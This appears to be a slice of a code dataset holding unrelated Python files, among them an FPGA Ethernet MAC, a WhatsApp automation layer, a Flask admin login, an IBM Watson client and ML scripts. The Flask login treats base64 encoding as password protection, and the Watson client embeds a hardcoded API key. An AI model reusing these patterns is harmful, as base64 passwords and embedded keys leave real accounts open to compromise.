Ram.din.next = 36 #C\r\n elif IP_Protocal == IP_Protocal_UDP: Ram.din.next = 37 #D\r\n else: Ram.din.next = 57 #X\r\n if CNT >= 10 and CNT <= 11:\r\n Ram.we.next = 1\r\n Ram.addr.next = Ram.addr + 1\r\n else:\r\n Ram.we.next = 0\r\n\r\n if State == TxS.UDP:\r\n IPHeader.next = 0\r\n if CNT < UDP_Header_Len - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.DATA\r\n\r\n if CNT == 0: UDPHeader.next = srcPort[16:8]\r\n if CNT == 1: UDPHeader.next = srcPort[8:]\r\n if CNT == 2: UDPHeader.next = desPort[16:8]\r\n if CNT == 3: UDPHeader.next = desPort[8:]\r\n if CNT == 4: UDPHeader.next = UDP_Length[16:8] #UDP Length\r\n if CNT == 5: UDPHeader.next = UDP_Length[8:]\r\n if CNT == 6: UDPHeader.next = 0 #UDP Header Checksum\r\n if CNT == 7: UDPHeader.next = 0\r\n\r\n if CNT == 6: SendDataEn.next = 1\r\n\r\n\r\n if State == TxS.DATA:\r\n UDPHeader.next = 0\r\n\r\n if CNT < Data_Length - 1 or CNT < 18 - 1: #UDP_Length - UDP_Header_Len\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.CRC\r\n\r\n # if CNT == 0: PktData.next = TxCNT[24:16]\r\n # if CNT == 1: PktData.next = TxCNT[16: 8]\r\n # if CNT == 2: PktData.next = TxCNT[8 : 0]\r\n\r\n if CNT < Data_Length: #and CNT > 2:\r\n PktData.next = SendData\r\n #SendDataEn.next = 1\r\n\r\n elif CNT >= Data_Length:\r\n PktData.next = 0 #CRC\r\n #SendDataEn.next = 0\r\n\r\n if CNT >= Data_Length - 2:\r\n SendDataEn.next = 0\r\n\r\n if CNT == 0: Ram.din.next = 0\r\n if CNT == 1: Ram.din.next = ToChar(int(TxCNT[24:20]))\r\n if CNT == 2: Ram.din.next = ToChar(int(TxCNT[20:16]))\r\n if CNT == 3: Ram.din.next = ToChar(int(TxCNT[16:12]))\r\n if CNT == 4: Ram.din.next = ToChar(int(TxCNT[12:8 ]))\r\n if CNT == 5: Ram.din.next = ToChar(int(TxCNT[8 : 4]))\r\n if CNT == 6: Ram.din.next = ToChar(int(TxCNT[4 : 0]))\r\n\r\n if CNT >= 0 and CNT <= 6:\r\n Ram.we.next = 1\r\n Ram.addr.next = Ram.addr + 1\r\n else:\r\n Ram.we.next = 0\r\n\r\n\r\n if State == TxS.CRC:\r\n SendDataEn.next = 0\r\n if CNT < Ether_CRC_LEN + 2 - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.GAP\r\n if CNT == 1:\r\n CrcEnable.next = 0\r\n if CNT == 4:\r\n TxEnReg.next = 0\r\n\r\n if State == TxS.GAP:\r\n PktData.next = 0\r\n if CNT < InterframeGap_Len - 1 + GapLength:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.IDLE\r\n TxEnd.next = 1\r\n CrcReset.next = 1\r\n\r\n\r\n StateReg.next = State\r\n if StateReg == TxS.IDLE : TxDataReg.next = 0\r\n if StateReg == TxS.ETH : TxDataReg.next = EthHeader\r\n if StateReg == TxS.ARP : TxDataReg.next = ARP_Data\r\n if StateReg == TxS.IP : TxDataReg.next = IPHeader\r\n if StateReg == TxS.UDP : TxDataReg.next = UDPHeader\r\n if StateReg == TxS.DATA : TxDataReg.next = PktData\r\n if StateReg == TxS.CRC : TxDataReg.next = 0\r\n if StateReg == TxS.GAP : TxDataReg.next = 0\r\n TxEnReg1.next = TxEnReg\r\n\r\n\r\n @always_seq(clk.posedge, reset=None)\r\n def Seq1():\r\n if State == TxS.CRC and CNT >= 2 and CNT <= 5:\r\n if CNT == 2: TxData.next = Crc[32:24]\r\n if CNT == 3: TxData.next = Crc[24:16]\r\n if CNT == 4: TxData.next = Crc[16:8]\r\n if CNT == 5: TxData.next = Crc[8:]\r\n\r\n else:\r\n TxData.next = TxDataReg\r\n TxEn.next = TxEnReg1\r\n\r\n\r\n\r\n return instances()","sub_path":"FPGA Ethernet Mac.py/Mac_Tx.py","file_name":"Mac_Tx.py","file_ext":"py","file_size_in_byte":10595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"533230015","text":"import base64\nimport datetime\nimport io\n\nfrom PIL import 
Image\nfrom yowsup.common.optionalmodules import PILOptionalModule\nfrom yowsup.layers.interface import YowInterfaceLayer, ProtocolEntityCallback\nfrom yowsup.layers.protocol_chatstate.protocolentities import OutgoingChatstateProtocolEntity\nfrom yowsup.layers.protocol_groups.protocolentities import ListGroupsIqProtocolEntity, LeaveGroupsIqProtocolEntity\nfrom yowsup.layers.protocol_messages.protocolentities import TextMessageProtocolEntity\nfrom yowsup.common.tools import Jid\nimport time\nfrom yowsup.layers.protocol_presence.protocolentities import AvailablePresenceProtocolEntity, \\\n UnavailablePresenceProtocolEntity\nfrom yowsup.layers.protocol_profiles.protocolentities import SetStatusIqProtocolEntity, GetPictureIqProtocolEntity, \\\n SetPictureIqProtocolEntity\nfrom yowsup.layers.protocol_receipts.protocolentities import IncomingReceiptProtocolEntity, \\\n OutgoingReceiptProtocolEntity\n\nfrom whatsapp_controller.io_messages import events\nfrom yowsup.layers.protocol_messages.protocolentities.message import MessageProtocolEntity\n\n\nclass WhatsappObserverLayer(YowInterfaceLayer):\n def send_message(self, phone, message):\n \"\"\" Send Message which Whatsapp to a number\n \n This function will send a message to a number, but will try 'humanize' the process, e.g. set online status and \n set typing status and then send the message.\n \n Args:\n phone (str): \n message (str): \n\n Returns:\n bool: True if the message was sent\n \"\"\"\n number = Jid.normalize(phone)\n\n self.set_web_status()\n time.sleep(.5)\n\n self.set_writing_status(number)\n time.sleep(.5)\n\n self.set_writing_status(number, False)\n time.sleep(.5)\n\n send_message = TextMessageProtocolEntity(message, to=number)\n\n self.toLower(send_message)\n time.sleep(.5)\n\n self.set_web_status(False)\n\n return send_message.getId()\n\n def set_web_status(self, online=True):\n if online:\n self.toLower(AvailablePresenceProtocolEntity())\n else:\n self.toLower(UnavailablePresenceProtocolEntity())\n\n def set_writing_status(self, to_number, is_writing=True):\n if is_writing:\n self.toLower(OutgoingChatstateProtocolEntity(OutgoingChatstateProtocolEntity.STATE_TYPING, to_number))\n else:\n self.toLower(OutgoingChatstateProtocolEntity(OutgoingChatstateProtocolEntity.STATE_PAUSED, to_number))\n\n @ProtocolEntityCallback(\"success\")\n def on_success_event(self, success_protocol_entity):\n # self.set_web_status(True)\n # self.contact_picture('5521986624095')\n # self.contact_picturePreview('5521986624095')\n # print(self.groups_list())\n self.send_message(\"5521986624095\", \"Apenas testando a vizualização\")\n pass\n\n def set_message_read_state(self, message_id, to_number, read=True):\n message_protocol_entity = OutgoingReceiptProtocolEntity(message_id, Jid.normalize(to_number), read=read)\n self.toLower(message_protocol_entity)\n\n @ProtocolEntityCallback(\"receipt\")\n def on_receipt_event(self, message_protocol_entity):\n message_id = message_protocol_entity.getId()\n type_status = message_protocol_entity.getType()\n date = datetime.datetime.fromtimestamp(float(message_protocol_entity.timestamp))\n\n if events.mensagem_recebida(message_id, lida=type_status, data=date, telefone=self.getOwnJid(False)):\n self.toLower(message_protocol_entity.ack())\n\n @ProtocolEntityCallback(\"message\")\n def on_message_event(self, message_protocol_entity):\n if message_protocol_entity.getType() == MessageProtocolEntity.MESSAGE_TYPE_TEXT \\\n and not message_protocol_entity.isBroadcast() and not message_protocol_entity.isGroupMessage() and \\\n 
self._text_message_received(message_protocol_entity):\n\n self.set_web_status()\n time.sleep(.5)\n\n self.toLower(message_protocol_entity.ack())\n time.sleep(.5)\n\n self.set_web_status(False)\n\n def _text_message_received(self, message_protocol_entity):\n message_id = message_protocol_entity.getId()\n number = message_protocol_entity.getFrom(False)\n name = message_protocol_entity.getNotify()\n text_message = message_protocol_entity.getBody()\n date_received = datetime.datetime.fromtimestamp(message_protocol_entity.getTimestamp())\n return events.save_incoming_text_message(message_id, telefone_remetente=number, nome_remetente=name,\n texto=text_message, data=date_received,\n telefone=self.getOwnJid(False))\n\n def set_status_profile(self, text):\n\n def onSuccess(resultIqEntity, originalIqEntity):\n print(\"Status updated successfully\")\n\n def onError(errorIqEntity, originalIqEntity):\n print(\"Error updating status\")\n\n entity = SetStatusIqProtocolEntity(text)\n self._sendIq(entity, onSuccess, onError)\n\n def get_contact_picture(self, jid, preview=True):\n entity = GetPictureIqProtocolEntity(Jid.normalize(jid), preview=preview)\n self._sendIq(entity, self.on_get_contact_picture_result)\n\n def on_get_contact_picture_result(self, resultGetPictureIqProtocolEntiy, getPictureIqProtocolEntity):\n # path = r\"C:\\Users\\Ruan\\Pictures\\zap\\%s_%s.png\" % (getPictureIqProtocolEntity.getTo(), \"preview\" if resultGetPictureIqProtocolEntiy.isPreview() else \"full\")\n picture = resultGetPictureIqProtocolEntiy.getPictureData().encode('ISO-8859-1')\n print(base64.b64decode(picture))\n\n # def groups_list(self):\n # entity = ListGroupsIqProtocolEntity()\n # self.toLower(entity)\n # print(entity)\n # print(entity.toProtocolTreeNode())\n # self.group_leave(entity.getTag())\n\n # @clicmd(\"Leave a group you belong to\", 4)\n # def group_leave(self, group_jid):\n # entity = LeaveGroupsIqProtocolEntity([Jid.normalize(group_jid)])\n # # self.toLower(entity)\n # print(entity)","sub_path":"old/whatsapp_controller/whatsapp_api/whatsapp_observer_layer.py","file_name":"whatsapp_observer_layer.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"498367587","text":"# Licensed under the Prefect Community License, available at\n# https://www.prefect.io/legal/prefect-community-license\n\n\n\"\"\"\nAdd task run trigger\n\nRevision ID: 6c48e68b5e97\nRevises: 7ff37edbf446\nCreate Date: 2020-03-18 13:10:36.269070\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql import JSONB, UUID\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6c48e68b5e97\"\ndown_revision = \"7ff37edbf446\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.execute(\n \"\"\"\n CREATE FUNCTION insert_task_runs_after_flow_run_insert() RETURNS TRIGGER AS $$\n BEGIN\n -- create task runs for each of the tasks in the new flow run's\n -- flow\n INSERT INTO task_run (flow_run_id, task_id, cache_key, map_index)\n SELECT NEW.id, task.id, task.cache_key, -1\n FROM task\n WHERE task.flow_id = NEW.flow_id;\n\n -- create corresponding states for each of the new task runs\n INSERT INTO task_run_state(task_run_id, state, message, serialized_state)\n SELECT task_run.id, 'Pending', 'Task run created', '{\"type\": \"Pending\", \"message\": \"Task run created\"}'\n FROM task_run\n WHERE task_run.flow_run_id = NEW.id;\n RETURN NEW;\n END;\n $$ LANGUAGE plpgsql;\n\n CREATE TRIGGER 
insert_task_runs_after_flow_run_insert\n AFTER INSERT\n ON flow_run\n FOR EACH ROW\n EXECUTE PROCEDURE insert_task_runs_after_flow_run_insert();\n \"\"\"\n )\n\n\ndef downgrade():\n op.execute(\"DROP FUNCTION insert_task_runs_after_flow_run_insert CASCADE;\")\n","sub_path":"server/services/postgres/alembic/versions/2020-03-18T131036_add_task_run_trigger.py","file_name":"2020-03-18T131036_add_task_run_trigger.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"59383356","text":"from typing import Tuple, List\nfrom overrides import overrides\n\nfrom allennlp.common.util import JsonDict, sanitize\nfrom allennlp.data import DatasetReader, Instance\nfrom allennlp.models import Model\nfrom allennlp.service.predictors.predictor import Predictor\nfrom allennlp.data.tokenizers.word_splitter import SpacyWordSplitter\n\n\n@Predictor.register('constituency-parser')\nclass ConstituencyParserPredictor(Predictor):\n \"\"\"\n Wrapper for the :class:`~allennlp.models.SpanConstituencyParser` model.\n \"\"\"\n def __init__(self, model: Model, dataset_reader: DatasetReader) -> None:\n super().__init__(model, dataset_reader)\n self._tokenizer = SpacyWordSplitter(language='en_core_web_sm')\n\n @overrides\n def _json_to_instance(self, json_dict: JsonDict) -> Tuple[Instance, JsonDict]:\n \"\"\"\n Expects JSON that looks like ``{\"sentence\": \"...\"}``.\n \"\"\"\n sentence_text = [token.text for token in self._tokenizer.split_words(json_dict[\"sentence\"])]\n return self._dataset_reader.text_to_instance(sentence_text), {\"sentence\": sentence_text}\n\n @overrides\n def predict_json(self, inputs: JsonDict, cuda_device: int = -1) -> JsonDict:\n instance, return_dict = self._json_to_instance(inputs)\n outputs = self._model.forward_on_instance(instance, cuda_device)\n return_dict.update(outputs)\n\n # format the NLTK tree as a string on a single line.\n tree = return_dict.pop(\"trees\")\n return_dict[\"trees\"] = tree.pformat(margin=1000000)\n return sanitize(return_dict)\n\n @overrides\n def predict_batch_json(self, inputs: List[JsonDict], cuda_device: int = -1) -> List[JsonDict]:\n instances, return_dicts = zip(*self._batch_json_to_instances(inputs))\n outputs = self._model.forward_on_instances(instances, cuda_device)\n for output, return_dict in zip(outputs, return_dicts):\n return_dict.update(output)\n # format the NLTK tree as a string on a single line.\n tree = return_dict.pop(\"trees\")\n return_dict[\"trees\"] = tree.pformat(margin=1000000)\n return sanitize(return_dicts)\n","sub_path":"allennlp/service/predictors/constituency_parser.py","file_name":"constituency_parser.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"494397977","text":"import keras\nfrom keras_retinanet import models\nfrom keras_retinanet.utils.image import read_image_bgr, preprocess_image, resize_image\nfrom keras_retinanet.utils.colors import label_color\nfrom keras_retinanet.utils.gpu import setup_gpu\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\nimport numpy as np\nimport time\n\n\n\ngpu = 0\n\n# set the modified tf session as backend in keras\n\nsetup_gpu(gpu)\n\n\n\nmodel_path = os.path.join('./snapshots/resnet50_csv_1000.h5')\n\n# load retinanet model\nmodel = models.load_model(model_path, backbone_name='resnet50')\n\n# if the model is not converted to an inference model, use the line below\n# see: 
https://github.com/fizyr/keras-retinanet#converting-a-training-model-to-inference-model\nmodel = models.convert_model(model)\n\n#print(model.summary())\n\n# load label to names mapping for visualization purposes\nlabels_to_names = {0: 'vita_500', 1: 'gas_hwal', 2: 'hongsam', 3: 'dailyC', 4: 'mango', 5: 'red_bull', 6: 'gal_bae', 7: 'tejava', 8: 'power', 9: 'peach', 10: 'sol', 11: 'grape', 12: 'pocari', 13: '2%'}\n\n\n\n\n\n# load image\nimage = read_image_bgr('./1.jpg')\noutput_path = './1_result.jpg'\n\n# copy to draw on\ndraw = image.copy()\ndraw = cv2.cvtColor(draw, cv2.COLOR_BGR2RGB)\n\n# preprocess image for network\nimage = preprocess_image(image)\nimage, scale = resize_image(image)\n\n# process image\nstart = time.time()\nboxes, scores, labels = model.predict_on_batch(np.expand_dims(image, axis=0))\nprint(\"processing time: \", time.time() - start)\n\n# correct for image scale\nboxes /= scale\n\ndef draw_box(image, box, color, thickness=5):\n \"\"\" Draws a box on an image with a given color.\n\n # Arguments\n image : The image to draw on.\n box : A list of 4 elements (x1, y1, x2, y2).\n color : The color of the box.\n thickness : The thickness of the lines to draw a box with.\n \"\"\"\n b = np.array(box).astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), color, thickness, cv2.LINE_AA)\n\n\n\ndef draw_caption(image, box, caption):\n \"\"\" Draws a caption above the box in an image.\n\n # Arguments\n image : The image to draw on.\n box : A list of 4 elements (x1, y1, x2, y2).\n caption : String containing the text to draw.\n \"\"\"\n b = np.array(box).astype(int)\n #cv2.putText(image, caption, (b[0], b[1] - 10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 0), 2)\n cv2.putText(image, caption, (b[0], b[1] - 10), cv2.FONT_HERSHEY_PLAIN, 3, (255, 255, 255), 3)\n\n\ndef draw_boxes(image, boxes, color, thickness=2):\n \"\"\" Draws boxes on an image with a given color.\n\n # Arguments\n image : The image to draw on.\n boxes : A [N, 4] matrix (x1, y1, x2, y2).\n color : The color of the boxes.\n thickness : The thickness of the lines to draw boxes with.\n \"\"\"\n for b in boxes:\n draw_box(image, b, color, thickness=thickness)\n\n# visualize detections\nfor box, score, label in zip(boxes[0], scores[0], labels[0]):\n # scores are sorted so we can break\n if score < 0.5:\n break\n \n color = label_color(label)\n \n b = box.astype(int)\n draw_box(draw, b, color=color)\n \n caption = \"{} {:.3f}\".format(labels_to_names[label], score)\n draw_caption(draw, b, caption)\n detected_img =cv2.cvtColor(draw, cv2.COLOR_RGB2BGR)\n cv2.imwrite(output_path, detected_img)\n \n#plt.figure(figsize=(15, 15))\n#plt.axis('off')\n#cv2.imwrite(draw)\n#plt.show()\n\n\"\"\"\ndef round_int(x):\n if x == float(\"inf\") or x == float(\"-inf\"):\n return float('nan') # or x or return whatever makes sense\n return int(round(x))\n\ndef detect(net, meta, image, model, train_num, thresh=.3, hier_thresh=.7, nms=.15):\n im = load_image(\"./test_img/%s\"%image, 0, 0)\n num = c_int(0)\n pnum = pointer(num)\n predict_image(net, im)\n dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)\n num = pnum[0]\n fontpath = '/usr/share/fonts/truetype/nanum/NanumBarunGothic.ttf'\n pont = ImageFont.truetype(fontpath, 70)\n if (nms): do_nms_obj(dets, num, meta.classes, nms);\n\n res = []\n img = cv2.imread(\"./test_img/%s\"%image)\n for j in range(num):\n for i in range(meta.classes):\n if dets[j].prob[i] > 0:\n b = dets[j].bbox\n res.append((meta.names[i], dets[j].prob[i], (b.x, b.y, b.w, b.h)))\n\n if model == 
\"distance\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (255, 0, 0), 3)\n elif model == \"no_distance\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (0, 255, 0), 3)\n elif model == \"nobrand\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (0, 0, 255), 3)\n elif model == \"total\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (255, 255, 255), 3)\n elif model == \"classification\":\n cv2.rectangle(img, (int(b.x-(b.w/2)), int(b.y-(b.h/2))), (int(b.x+(b.w/2)), int(b.y+(b.h/2))), (0, 0, 255), 3)\n # cv2.putText(img, str(meta.names[i]), (int(b.x), int(b.y) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n # cv2.putText(img, dic[str(meta.names[i])], (int(b.x), int(b.y) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n # cv2.putText(img, dic[str(meta.names[i])], (int(b.x), int(b.y) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n img_pil = Image.fromarray(img)\n draw = ImageDraw.Draw(img_pil)\n bb,g,r,a = 255,255,255,0\n ff_t = str(str(meta.names[i]))\n ff_t = ff_t.decode('utf-8')\n draw.text((int(b.x-(b.w/2)), int(b.y-(b.h/2-100))), ff_t,font=pont, fill=(bb,g,r))\n print(str(meta.names[i]))\n img = np.array(img_pil)\n \n\"\"\"\n\n","sub_path":"Object-Detection/Keras-Retinanet/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"586576273","text":"from os import name\nfrom django.urls import path\nfrom .views import Create, Crud, Delete, Update, index\n\napp_name = 'app'\n\nurlpatterns = [\n path('',index,name='index'),\n path('delete_/',Delete,name='delete'),\n path('crud',Crud,name='crud'),\n path('create',Create,name='create'),\n path('update_/',Update,name='update')\n]\n","sub_path":"Crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"595383898","text":"from __future__ import print_function\nimport sys\nimport __main__\nfrom flask import Flask, render_template, redirect, Blueprint, url_for, flash, request, current_app, session\nfrom helpers import tasks\nfrom forms.admin import loginclass\nfrom flask_login import current_user, login_user\nimport flask_login\nimport base64\nfrom flask_admin import BaseView\nfrom .. 
import db\nfrom flask import render_template, redirect\n\nauthroutes = Blueprint('authroutes', __name__, template_folder='templates')\n\n\n\t\n@authroutes.route('/admin/login', methods=['GET','POST'])\ndef login():\n\tloginForm = loginclass.CreateLogin(prefix='frmlogin')\n\n\t#return render_template('security/login_user.html')\n\tif request.method == 'POST' :\n\t\t\n\t\tstrpassword = str(base64.encodestring(loginForm.password.data))\n\t\tif loginForm.email.data and strpassword :\n\t\t\tuser_rec = db.users.find_one({'email': str(loginForm.email.data), 'password': str(strpassword).rstrip(\"\\r\\n\"), 'active': 1, 'is_deleted': 0, 'role': 'admin'})\n\t\t\tif user_rec == None:\n\t\t\t\tflash(u'Incorrect Credentials', 'error')\n\t\t\t\treturn redirect('/admin/login')\n\t\t\telse :\n\t\t\t\tsession['logged_in'] = True\n\t\t\t\tuserid = \"\" + str(user_rec.get('_id'))\n\t\t\t\tsession['user_id'] = \"\" + userid\n\t\t\t\tsession['user_email'] = user_rec.get('email')\n\t\t\t\tsession['user_name'] = user_rec.get('firstname') + \" \" + user_rec.get('lastname')\n\t\t\t\tuser_count = db.users.find({'is_deleted': 0, 'role': 'user'}).count()\n\t\t\t\tif(user_count == None):\n\t\t\t\t\tuser_count = 0\n\t\t\t\tclassifieds_count = db.classifieds.find({'is_deleted': 0}).count()\n\t\t\t\tif(classifieds_count == None):\n\t\t\t\t\tclassifieds_count = 0\n\t\t\t\t\t\n\t\t\t\t# category count\n\t\t\t\tcategories_count = db.categories.find({'is_deleted': 0}).count()\n\t\t\t\tif(categories_count == None):\n\t\t\t\t\tcategories_count = 0\n\t\t\t\t\n\t\t\t\t# category count\n\t\t\t\tcms_page_count = db.cms_page.find({'is_deleted': 0}).count()\n\t\t\t\tif(cms_page_count == None):\n\t\t\t\t\tcms_page_count = 0\n\t\t\t\t# baaner count\n\t\t\t\thome_banners_count = db.home_banners.find({'is_deleted': 0}).count()\n\t\t\t\tif(home_banners_count == None):\n\t\t\t\t\thome_banners_count = 0\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\tflash(u'You have logged in successfully', 'success')\n\t\t\t\treturn render_template('admin/index.html',categories_count= categories_count,cms_page_count=cms_page_count,home_banners_count=home_banners_count, user_rec = user_rec, user_count = user_count, classifieds_count = classifieds_count)\n\t\t#print('params-->' + loginForm.email.data + '--' + loginForm.password.data)\n\treturn render_template('security/login_user.html',loginForm = loginForm)\n\n@authroutes.route('/admin/logout', methods=['GET'])\ndef logoutuser():\n\tflask_login.logout_user()\n\tsession['logged_in'] = False\n\tflash(u'You have logged out successfully', 'success')\n\treturn redirect('/admin/login')\n\n@authroutes.route('/admin/home', methods=['GET'])\ndef showdashboard():\n\tif not session.get('logged_in') == True:\n\t\tflash(u'Please login to continue', 'error')\n\t\treturn redirect('/admin/login')\n\tuser_count = db.users.find({'is_deleted': 0, 'role': 'user'}).count()\n\tif(user_count == None):\n\t\tuser_count = 0\n\tclassifieds_count = db.classifieds.find({'is_deleted': 0}).count()\n\tif(classifieds_count == None):\n\t\tclassifieds_count = 0\n\t# category count\n\tcategories_count = db.categories.find({'is_deleted': 0}).count()\n\tif(categories_count == None):\n\t\tcategories_count = 0\n\t\n\t# category count\n\tcms_page_count = db.cms_page.find({'is_deleted': 0}).count()\n\tif(cms_page_count == None):\n\t\tcms_page_count = 0\n\t# baaner count\n\thome_banners_count = db.home_banners.find({'is_deleted': 0}).count()\n\tif(home_banners_count == None):\n\t\thome_banners_count = 0\n\t\t\n\tif(session['logged_in']):\n\t user_rec = 
db.users.find_one({'email': session['user_email'], 'active': 1, 'is_deleted': 0})\n\t return render_template('admin/index.html',home_banners_count=home_banners_count,cms_page_count=cms_page_count, categories_count = categories_count,user_rec = user_rec, user_count = user_count, classifieds_count = classifieds_count)\n\telse:\n\t\tflash(u'Please login to continue', 'error')\n\t\tloginForm = loginclass.CreateLogin(prefix='frmlogin')\n\t\treturn render_template('security/login_user.html',loginForm = loginForm)\n","sub_path":"routers/admin/authroutes.py","file_name":"authroutes.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"341617607","text":"import tkinter as tk\nfrom klient import *\n\n\nclass WidokListaKlientow(tk.Frame):\n\tdef __init__(self, parent, controller):\n\t\tself.controller = controller\n\t\ttk.Frame.__init__(self, parent)\n\t\t\n\t\ttop_frame = tk.Frame(self)\n\t\tinput_wyszukaj = tk.Entry(top_frame)\n\t\tinput_wyszukaj.grid(row=0, column=0)\n\n\t\tbutton_wyszukaj = tk.Button(top_frame, text=\"Wyszukaj\")\n\t\tbutton_wyszukaj.grid(row=0, column=1)\n\n\t\tbutton_dodaj_klienta = tk.Button(top_frame, text=\"Dodaj klienta\")\n\t\tbutton_dodaj_klienta.grid(row=0, column=3)\n\n\t\tbottom_frame = tk.Frame(self)\n\t\tlabel_id = tk.Label(bottom_frame, text=\"Id\")\n\t\tlabel_id.grid(row=0, column=0)\n\n\t\tlabel_nazwa = tk.Label(bottom_frame, text=\"Nazwa klienta\")\n\t\tlabel_nazwa.grid(row=0, column=1)\n\n\t\tlabel_akcja = tk.Label(bottom_frame, text=\"Akcje\")\n\t\tlabel_akcja.grid(row=0, column=2)\n\n\n\t\tklienci = wczytaj_klientow()\n\t\tfor i in range(len(klienci)):\n\t\t\ttk.Label(bottom_frame, text=klienci[i].id).grid(row=i+1, column=0)\n\t\t\ttk.Label(bottom_frame, text=klienci[i].nazwa).grid(row=i+1, column=1)\n\t\t\ttk.Button(bottom_frame, text=\"Wyswietl profil\", command=lambda i=i: controller.wczytaj_uslugi(klienci[i].id)).grid(row=i+1, column=2)\n\n\t\ttop_frame.pack()\n\t\tbottom_frame.pack()\n","sub_path":"widok_lista_klientow.py","file_name":"widok_lista_klientow.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"550836649","text":"from math import sqrt\nfrom typing import List\n\n\ndef euclidean_distance(row1: List[float], row2: List[float]) -> float:\n \"\"\"\n Return the euclidian distance between 2 rows\n :return: the euclidian distance\n \"\"\"\n assert len(row1) == len(row2), \"Vectors do not have the same length\"\n distance = sqrt(sum([(a - b) ** 2 for a, b in zip(row1, row2)]))\n return distance\n\n\ndef get_nearest_neighbors(train_set: List[List[float]], input_row: List[float], K: int) -> List[int]:\n \"\"\"\n return the indices of the nearest neighbors\n :param train_set: list of train rows\n :param input_row: row to find the neighbors\n :param K: number of neighbors to consider\n :return: the indices of the K nearest neighbors\n \"\"\"\n train_set = [(index, train_row) for index,train_row in zip(range(len(train_set)), train_set)]\n distances = [(train_row[0], euclidean_distance(input_row, train_row[1])) for train_row in train_set]\n distances.sort(key=lambda tup: tup[1])\n neighbors_indices = [distances[i][0] for i in range(K)]\n return neighbors_indices\n\n\ndef predict(train_set: List[List[float]], labels_set: List[int], input_row: List[float], K: int) -> int:\n \"\"\"\n\n :param train_set:\n :param labels_set:\n :param input_row:\n :param K:\n :return: the 
predicted class of the input row\n \"\"\"\n neighbors_indices = get_nearest_neighbors(train_set, input_row, K)\n neighbors_classes = [labels_set[indice] for indice in neighbors_indices]\n predicted_class = max(set(neighbors_classes), key=neighbors_classes.count)\n return predicted_class\n\n\n\n\nprint(\"ok\")\n","sub_path":"KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"647092526","text":"import os\nimport json\nfrom ibm_watson import VisualRecognitionV4\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom ibm_watson.visual_recognition_v4 import AnalyzeEnums, FileWithMetadata\nimport draw_json\n\nauthenticator = IAMAuthenticator('4-ejwb43zCRCOJAgo1p-l_arPHzyNG3wWihdPWzdIqjm')\nvisual_recognition = VisualRecognitionV4(\n version='2019-02-11',\n authenticator=authenticator\n)\nvisual_recognition.set_service_url(\"https://api.us-south.visual-recognition.watson.cloud.ibm.com/instances/63946c59-5e29-4323-99f1-6c1b114f4e95\")\n\ncollect_id = \"e05d041b-3181-484a-aaee-17785cf11bc2\"\n\ndef analyze_results( path):\n try:\n with open(path, 'rb') as honda_file:\n result = visual_recognition.analyze(\n collection_ids=[collect_id],\n features=[AnalyzeEnums.Features.OBJECTS.value],\n images_file=[\n FileWithMetadata(honda_file)\n ], threshold=0.25).get_result()\n print(result)\n print(type(result))\n return result\n except:\n print(path)\n return None\ndef analyzing(path):\n result = analyze_results(path)\n if result is not None:\n image_path = draw_json.drawing_json(path,result)\n return image_path","sub_path":"analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"318794030","text":"from time import sleep\nfrom json import dumps\nfrom kafka import KafkaProducer\nimport random\nimport datetime as dt\nimport pandas\n\n\ndef readCSV():\n climate_streaming_data = pandas.read_csv('hotspot_TERRA_streaming.csv')\n streaming_data = []\n for _, row in climate_streaming_data.iterrows():\n data_point = {}\n data_point['latitude'] = float(row['latitude'])\n data_point['longitude'] = 